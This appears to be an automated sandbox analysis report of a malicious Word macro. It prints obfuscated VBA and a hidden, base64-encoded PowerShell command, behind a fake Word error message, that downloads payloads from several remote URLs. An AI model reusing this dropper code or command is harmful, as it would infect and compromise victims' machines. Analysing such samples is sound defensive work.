                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            FLtYjKHC

                                            Close

                                            qAUhkIMz

                                            Create

                                            		SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            V2enhc4htwl7z6bh

                                            Thriap3q9rgf3yy9y

                                            zZuzBZGD

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            OIbfvEEFF

                                            Close

                                            eLmLDU

                                            FYVZFEH

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            hoyzuBGCP

                                            Close

                                            lADFBaJ

                                            StringsDecrypted Strings
                                            "Jsnt2t9fi0a8nnsiaf""Bete9x47doew46v"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC"
                                            "VrVKCjefsIJ"
                                            "sxbwAfRtWJI"
                                            "WLXLJnjItPGPZJ"
                                            "]anw[3""p]anw[3"
                                            "]an""w[3ro]anw[3]a""nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF"
                                            "ImJJdfAtdFHCh"
                                            "deVdMyoREdgzCaJb"
                                            "XZzpBRpDKuMgsGHIHF"
                                            "]anw[3:w]anw[3]anw[3i""n]anw[33]anw[32]anw[3_]anw[3"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf"
                                            "uTtCAFwHpCGF"
                                            "lwWhZGEasjsS"
                                            "MiCjaGqJfPrI"
                                            "w]anw[3in]anw[3m]an""w[3gm]anw[3t]anw[3]anw[3"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "HQGixyC:\vETCeBG\zIuEqsGG.NobmDA"
                                            "dXFPCSYtSNB"
                                            "KqVyuQQfwTWh"
                                            "qDaYIDDSZQMTaO"
                                            "]anw[3""]anw[3"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ"
                                            "MxCpGaGqBgemCAFEJ"
                                            "hbtzFRJEXyDCXI"
                                            "zdTcdOoXXUFHJK"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo"
                                            "hKlajOujwgDFAA"
                                            "JMgUDAIEJlgyNBH"
                                            "BUUJYAAIoJvLBLAo"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ"
                                            "CVbRCAAhkhmcDG"
                                            "XrrAwQZPjqB"
                                            "fxSJajCGlWUEBW"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD"
                                            "qiXBsMBsLJGbX"
                                            "mehEFPFHcklgJDDx"
                                            "BndJDkuVYF"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH"
                                            "JTSPCDjykfL"
                                            "bBmgOCvPPojGGC"
                                            "anBQXljzGenE"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "pGMMG:\enlVVB\fMqiFP.kEIECDZHz"
                                            "dnUnKFHAkIOdD"
                                            "ekluIEBJFIgoBcGC"
                                            "BnxHFzJCGhVHrFIm"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW"
                                            "fDdPHEjBEnAdZqZFJ"
                                            "wypNISsWSXthFJCq"
                                            "LvnHAGHfIhRDBRAF"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA"
                                            "DBvMcNtCcMyJDDI"
                                            "eXpjHFapHaPdRJu"
                                            "eXObOTlBAITEOIo"
                                            LineInstructionMeta Information
                                            2

                                            Function G8xesq0b8jlsfrsp()

                                            3

                                            On Error Resume Next

                                            executed
                                            4

                                            Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"

                                            5

                                            sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89

                                            Zw1k7hcmdl66

                                            Item

                                            Hyii7r76oq89

                                            6

                                            Goto SblcDCC

                                            7

                                            Dim pULquU as Object

                                            8

                                            Set ibIiBF = diCXTi

                                            diCXTi

                                            9

                                            Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            10

                                            Dim SblcDCC as Object

                                            11

                                            Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")

                                            CreateTextFile

                                            12

                                            SblcDCC.WriteLine "VrVKCjefsIJ"

                                            WriteLine

                                            13

                                            SblcDCC.WriteLine "sxbwAfRtWJI"

                                            WriteLine

                                            14

                                            SblcDCC.WriteLine "WLXLJnjItPGPZJ"

                                            WriteLine

                                            15

                                            Set jbUmDI = NZiApKAp

                                            NZiApKAp

                                            16

                                            SblcDCC.Close

                                            Close

                                            17

                                            Set pULquU = Nothing

                                            18

                                            Set MznOjBB = vrYYHIDxI

                                            vrYYHIDxI

                                            19

                                            Set SblcDCC = Nothing

                                            19

                                            SblcDCC:

                                            21

                                            t3s = "]anw[3" + "p]anw[3"

                                            22

                                            K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"

                                            23

                                            Goto fNhiCVgGS

                                            24

                                            Dim RyDBDK as Object

                                            25

                                            Set WTbkNqFa = gzTFLxb

                                            gzTFLxb

                                            26

                                            Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            27

                                            Dim fNhiCVgGS as Object

                                            28

                                            Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")

                                            CreateTextFile

                                            29

                                            fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"

                                            WriteLine

                                            30

                                            fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"

                                            WriteLine

                                            31

                                            fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"

                                            WriteLine

                                            32

                                            Set OlapGi = PjNhJNA

                                            PjNhJNA

                                            33

                                            fNhiCVgGS.Close

                                            Close

                                            34

                                            Set RyDBDK = Nothing

                                            35

                                            Set yabVbA = oAaNlB

                                            oAaNlB

                                            36

                                            Set fNhiCVgGS = Nothing

                                            36

                                            fNhiCVgGS:

                                            38

                                            Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"

                                            39

                                            Goto HCvCmAcHC

                                            40

                                            Dim iFTmFHFH as Object

                                            41

                                            Set UDSpFHqFJ = sySRJ

                                            sySRJ

                                            42

                                            Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            43

                                            Dim HCvCmAcHC as Object

                                            44

                                            Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")

                                            CreateTextFile

                                            45

                                            HCvCmAcHC.WriteLine "uTtCAFwHpCGF"

                                            WriteLine

                                            46

                                            HCvCmAcHC.WriteLine "lwWhZGEasjsS"

                                            WriteLine

                                            47

                                            HCvCmAcHC.WriteLine "MiCjaGqJfPrI"

                                            WriteLine

                                            48

                                            Set MmSDYCkJR = UwyYSBsBN

                                            UwyYSBsBN

                                            49

                                            HCvCmAcHC.Close

                                            Close

                                            50

                                            Set iFTmFHFH = Nothing

                                            51

                                            Set EISYDDB = tpOgXmm

                                            tpOgXmm

                                            52

                                            Set HCvCmAcHC = Nothing

                                            52

                                            HCvCmAcHC:

                                            54

                                            Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"

                                            55

                                            Goto gEcrV

                                            56

                                            Dim RqlOZAHRJ as Object

                                            57

                                            Set jsYAGBJAF = MHYlQAD

                                            MHYlQAD

                                            58

                                            Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            59

                                            Dim gEcrV as Object

                                            60

                                            Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")

                                            CreateTextFile

                                            61

                                            gEcrV.WriteLine "dXFPCSYtSNB"

                                            WriteLine

                                            62

                                            gEcrV.WriteLine "KqVyuQQfwTWh"

                                            WriteLine

                                            63

                                            gEcrV.WriteLine "qDaYIDDSZQMTaO"

                                            WriteLine

                                            64

                                            Set IePCGy = GznGGHyG

                                            GznGGHyG

                                            65

                                            gEcrV.Close

                                            Close

                                            66

                                            Set RqlOZAHRJ = Nothing

                                            67

                                            Set cwsTFPCH = bbsIZ

                                            bbsIZ

                                            68

                                            Set gEcrV = Nothing

                                            68

                                            gEcrV:

                                            70

                                            Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"

                                            Mid

                                            Name

                                            Application

                                            71

                                            Goto ZMdrVHGz

                                            72

                                            Dim xsruLB as Object

                                            73

                                            Set fiyQuiRBI = swNGWdd

                                            swNGWdd

                                            74

                                            Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            75

                                            Dim ZMdrVHGz as Object

                                            76

                                            Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")

                                            CreateTextFile

                                            77

